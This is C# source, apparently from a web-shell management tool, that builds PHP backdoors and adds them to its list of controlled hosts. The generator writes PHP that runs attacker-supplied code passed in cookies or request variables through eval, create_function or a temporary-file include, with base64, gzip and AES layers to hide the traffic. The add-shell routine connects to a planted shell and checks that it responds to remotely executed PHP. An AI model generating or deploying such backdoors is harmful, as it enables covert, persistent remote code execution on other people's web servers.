/// <summary>
/// Main backdoor "generation" code that forms the backdoor code based on the options
/// </summary>
/// <param name="varName"></param>
/// <param name="method"></param>
/// <param name="gzInflateRequest"></param>
/// <param name="backdoorType"></param>
/// <returns></returns>
public string generateBackdoor(string varName = "command", string method = "COOKIE", bool gzInflateRequest = false, BackdoorTypes backdoorType = BackdoorTypes.EVAL)
{
string backdoorResult = string.Empty;
string gzInflateStart = string.Empty;
string gzInflateEnd = string.Empty;
string requestEncryptionStart = string.Empty;
string requestEncryptionEnd = string.Empty;
string requestMethod = method.ToUpper(CultureInfo.InvariantCulture);
if (checkBoxEncryptRequest.Checked)
{
string encryptionKey = textBoxEncrpytionKey.Text;
if (encryptionKey.Length == CryptoHelper.KEY_Length)
{
if (checkBoxSendIVInRequest.Checked)
{
string encryptionIVVarName = textBoxIVVarName.Text;
if (!string.IsNullOrEmpty(encryptionIVVarName))
{
if (comboBoxRequestEncryptionType.Text == "openssl")
{
requestEncryptionStart = "@openssl_decrypt(";
requestEncryptionEnd = ", 'AES-256-CBC', '" + encryptionKey + "', OPENSSL_RAW_DATA, $_" + requestMethod + "['" + encryptionIVVarName + "'])";
}
else if (comboBoxRequestEncryptionType.Text == "mcrypt")
{
requestEncryptionStart = "rtrim(@mcrypt_decrypt(MCRYPT_RIJNDAEL_128, '" + encryptionKey + "', ";
requestEncryptionEnd = ", MCRYPT_MODE_CBC, $_" + requestMethod + "['" + encryptionIVVarName + "']), \"0\")";
}
}
}
else
{
string encryptionIV = textBoxEncrpytionIV.Text;
if (!string.IsNullOrEmpty(encryptionIV) && encryptionIV.Length == CryptoHelper.IV_Length)
{
if (comboBoxRequestEncryptionType.Text == "openssl")
{
requestEncryptionStart = "@openssl_decrypt(";
requestEncryptionEnd = ", 'AES-256-CBC', '" + encryptionKey + "', OPENSSL_RAW_DATA, '" + encryptionIV + "')";
}
else if (comboBoxRequestEncryptionType.Text == "mcrypt")
{
requestEncryptionStart = "rtrim(@mcrypt_decrypt(MCRYPT_RIJNDAEL_128, '" + encryptionKey + "', ";
requestEncryptionEnd = ", MCRYPT_MODE_CBC, '" + encryptionIV + "'), \"0\")";
}
}
}
}
}
if (gzInflateRequest)
{
gzInflateStart = "@gzinflate(";
gzInflateEnd = ")";
}
switch (backdoorType)
{
case BackdoorTypes.EVAL: {
backdoorResult = "<?php \r\n" +
"if(isset($_" + requestMethod + "['" + varName + "'])) {\r\n\t" +
"@eval(" + gzInflateStart + requestEncryptionStart + "@base64_decode($_" + requestMethod + "['" + varName + "'])" + requestEncryptionEnd + gzInflateEnd + ");\r\n}";
break;
}
//case BackdoorTypes.ASSERT: {
// backdoorResult = "<?php \r\nif(isset($_" + requestMethod + "['" + varName + "'])) {\r\n\t@assert(" + gzInflateStart + requestEncryptionStart + "@base64_decode($_" + requestMethod + "['" + varName + "'])" + requestEncryptionEnd + gzInflateEnd + ");\r\n}";
// break;
// }
case BackdoorTypes.CREATE_FUNCTION: {
backdoorResult = "<?php \r\n" +
"if(isset($_" + requestMethod + "['" + varName + "'])) {\r\n\t" +
"$a=@create_function(null, " + gzInflateStart + requestEncryptionStart + "@base64_decode($_" + requestMethod + "['" + varName + "'])" + requestEncryptionEnd + gzInflateEnd + ");\r\n\t" +
"$a();\r\n}";
break;
}
case BackdoorTypes.TMP_INCLUDE: {
backdoorResult = "<?php \r\n" +
"if(isset($_" + requestMethod + "['" + varName + "'])) {\r\n\t" +
"$fp = @tmpfile();\r\n\t" +
"$tmpf=@stream_get_meta_data($fp);\r\n\t" +
"$tmpf=$tmpf['uri'];\r\n\t" +
"@fwrite($fp, '<?php '." + gzInflateStart + requestEncryptionStart + "@base64_decode($_" + requestMethod + "['" + varName + "'])" + requestEncryptionEnd + gzInflateEnd + ");\r\n\t" +
"@include($tmpf);\r\n\t@fclose($f);\r\n}";
break;
}
//case BackdoorTypes.PREG_REPLACE: {
// //todo this looks wrong af and doesnt support gzip
// backdoorResult = "<?php \r\nif(isset($_" + requestMethod + "['" + varName + "'])) {\r\n\t@preg_replace(\"/.*/\x65\", " + gzInflateStart + requestEncryptionStart + "@base64_decode($_" + requestMethod + "['" + varName + "']" + requestEncryptionEnd + gzInflateEnd + "),'.');\r\n}";
// break;
// }
default:
LogHelper.AddGlobalLog("Unknown backdoor type selection.", "GUI Error", LogHelper.LOG_LEVEL.ERROR);
break;
}
if (chkbxMinifyCode.Checked)
{
backdoorResult = Helper.MinifyCode(backdoorResult);
}
return(backdoorResult);
}
/// <summary>
/// Main add shell/host To GUI routine
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
private async void btnAddShell_Click(object sender, EventArgs e)
{
string shellURL = txtBoxShellUrl.Text;
if (string.IsNullOrEmpty(shellURL))
{
return;
}
if (checkBoxEncryptRequest.Checked)
{
string encryptionKey = textBoxEncrpytionKey.Text;
if (encryptionKey.Length != 32)
{
labelDynAddHostsStatus.Text = "Encryption key length must be 32 chars... Try again.";
return;
}
if (!checkBoxSendIVInRequest.Checked)
{
string encryptionIV = textBoxEncrpytionIV.Text;
if (string.IsNullOrEmpty(encryptionIV) || encryptionIV.Length != 16)
{
labelDynAddHostsStatus.Text = "Encryption IV length must be 16 chars... Try again.";
return;
}
}
}
//Remove Shell
if (BantamMain.Shells.ContainsKey(shellURL))
{
BantamMain.Instance.GuiCallbackRemoveShellURL(shellURL);
if (!BantamMain.Shells.TryRemove(shellURL, out ShellInfo shellInfoOut))
{
LogHelper.AddGlobalLog("Unable to remove (" + shellURL + ") from shells", "AddShell failure", LogHelper.LOG_LEVEL.ERROR);
return;
}
}
//Add Shell
if (!BantamMain.Shells.TryAdd(shellURL, new ShellInfo()))
{
LogHelper.AddGlobalLog("Unable to add (" + shellURL + ") to shells", "AddShell failure", LogHelper.LOG_LEVEL.ERROR);
return;
}
BantamMain.Shells[shellURL].RequestArgName = txtBoxArgName.Text;
if (comboBoxVarType.Text == "cookie")
{
BantamMain.Shells[shellURL].SendDataViaCookie = true;
}
if (checkBoxResponseEncryption.Checked == false)
{
BantamMain.Shells[shellURL].ResponseEncryption = false;
}
else
{
BantamMain.Shells[shellURL].ResponseEncryption = true;
BantamMain.Shells[shellURL].ResponseEncryptionMode = comboBoxEncryptionMode.SelectedIndex;
}
if (checkBoxGZipRequest.Checked)
{
BantamMain.Shells[shellURL].GzipRequestData = true;
}
else
{
BantamMain.Shells[shellURL].GzipRequestData = false;
}
bool encryptResponse = BantamMain.Shells[shellURL].ResponseEncryption;
int ResponseEncryptionMode = BantamMain.Shells[shellURL].ResponseEncryptionMode;
if (checkBoxEncryptRequest.Checked)
{
BantamMain.Shells[shellURL].RequestEncryption = true;
BantamMain.Shells[shellURL].RequestEncryptionKey = textBoxEncrpytionKey.Text;
if (checkBoxSendIVInRequest.Checked)
{
BantamMain.Shells[shellURL].SendRequestEncryptionIV = true;
BantamMain.Shells[shellURL].RequestEncryptionIV = string.Empty;
BantamMain.Shells[shellURL].RequestEncryptionIVRequestVarName = textBoxIVVarName.Text;
}
else
{
BantamMain.Shells[shellURL].RequestEncryptionIV = textBoxEncrpytionIV.Text;
BantamMain.Shells[shellURL].RequestEncryptionIVRequestVarName = string.Empty;
}
}
else
{
BantamMain.Shells[shellURL].RequestEncryption = false;
BantamMain.Shells[shellURL].RequestEncryptionIVRequestVarName = string.Empty;
BantamMain.Shells[shellURL].RequestEncryptionIV = string.Empty;
BantamMain.Shells[shellURL].RequestEncryptionKey = string.Empty;
}
string phpCode = PhpBuilder.PhpTestExecutionWithEcho1(encryptResponse);
ResponseObject response = await WebRequestHelper.ExecuteRemotePHP(shellURL, phpCode);
if (string.IsNullOrEmpty(response.Result))
{
labelDynAddHostsStatus.Text = "Unable to connect, check your settings and try again.";
BantamMain.Shells.TryRemove(shellURL, out ShellInfo shellInfoOut);
return;
}
string result = response.Result;
if (encryptResponse)
{
result = CryptoHelper.DecryptShellResponse(response.Result, response.EncryptionKey, response.EncryptionIV, ResponseEncryptionMode);
}
if (string.IsNullOrEmpty(result) || result != "1")
{
labelDynAddHostsStatus.Text = "Unable to connect, check your settings and try again.";
BantamMain.Shells.TryRemove(shellURL, out ShellInfo shellInfoOut);
return;
}
BantamMain.Instance.InitializeShellData(shellURL);
this.Close();
}
